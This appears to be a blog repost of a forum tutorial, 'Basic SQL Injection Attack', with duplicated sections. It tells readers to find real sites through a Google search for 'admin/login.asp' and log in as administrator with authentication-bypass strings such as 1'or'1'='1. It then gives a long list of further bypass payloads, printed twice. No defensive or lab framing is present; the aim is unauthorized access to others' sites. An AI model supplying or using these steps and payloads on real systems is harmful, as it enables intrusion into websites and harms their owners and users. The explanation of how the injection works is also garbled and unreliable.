4:51 AM
![[Image: star.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ulb-0ZcbCcLKo91dwAxuJFmsMKu0xYn1GJi2L0L7joHfp2EGj73ruxKwXIqAUQ5hSD56Un9d7JCVHmSKRPK8pUCgmExGYrqmh9hlJPiFIxnTS3ikaN=s0-d)
![[Image: ub3rstar.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uM0GSE9D-hkd8_G6gBEaFfACjSCE3f7L8O4MGLW1zoRsqSG4SXiNlv1Y6lu0JCRy9gPp-N2BeFkG2h8Ds-SIi8YCin7CgSgK6mbaAZ2K5aVQyleht86diSvg=s0-d)
Basic SQL Injection Attack
For those people who just don't like to read much. I come straight to the point. 
We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
![[Image: GkatiJB.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uRX57UGUaJTt7oNCODyYc16KaTP2pyphk2fNKnIo-RlwKEyYYkHtr6kkLe8Zo7KZCoF6A2KvxURJEycV7RYFJMmg=s0-d)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
![[Image: Vl05pX5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v6L5p50G4ymGOcxOG1fvvvzS2LdeC-QNNiKNNeoy6_LMBMRXPwXtuHOu7wzqNv0ZJ0m74c2Wd-25mVOsFxoIxPQQ=s0-d)
Well done!! Your now logged in as ADMIN:
![[Image: kvv09kG.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_UHp8VNgKhe4cet2DkJBWBBR0ibWRRQGFoHMA4vKhtMbiDp12vbA_M8hK-FgMceSiTQzJ2nfJJ161Pa8TsLAqoA=s0-d)
![[Image: Heq2Tgg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_td8y8L4XM2R8ho20AKnob6nY6bB-kP_0ZGSSiDv66uwLC3IFAd-4hyL5DtL3s8Y3_lCyZY65qlHVIydbO1j-fz8w=s0-d)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
Spoiler (Click to Hide)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
Spoiler (Click to Hide)
Well done!! Your now logged in as ADMIN:
Spoiler (Click to Hide)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
Spoiler (Click to Hide)
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Note: Websites that record false logins, this is not gonna work on.
I made it simple as it is guys, no long story's.
Post below, for any questions/suggestions/feedback and enjoy!
Post below, for any questions/suggestions/feedback and enjoy!
0 comments:
Post a Comment